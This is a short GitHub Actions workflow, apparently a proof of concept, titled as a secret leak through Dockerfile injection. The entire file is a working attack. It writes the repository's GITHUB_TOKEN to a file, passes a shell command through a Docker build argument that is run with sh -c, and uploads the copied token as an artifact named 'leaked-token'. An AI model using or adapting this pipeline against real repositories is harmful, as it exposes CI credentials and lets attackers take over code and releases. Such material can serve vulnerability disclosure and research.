name: Critical Secret Leak via Dockerfile Injection

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    permissions:
      actions: read
      contents: read
      
    steps:
      - name: Setup leak file
        run: echo "${{ secrets.GITHUB_TOKEN }}" > token.txt

      - name: Malicious Docker Build (via PYTHON_VERSION)
        run: |
          echo 'FROM python:3.11-alpine
          ARG PYTHON_VERSION
          RUN echo "Running injected command..." && sh -c "$PYTHON_VERSION"' > Dockerfile

          docker build . --build-arg PYTHON_VERSION="cat /github/workspace/token.txt > /github/workspace/leaked.txt"

      - name: Upload Leaked Secret
        uses: actions/upload-artifact@v4
        with:
          name: leaked-token
          path: leaked.txt
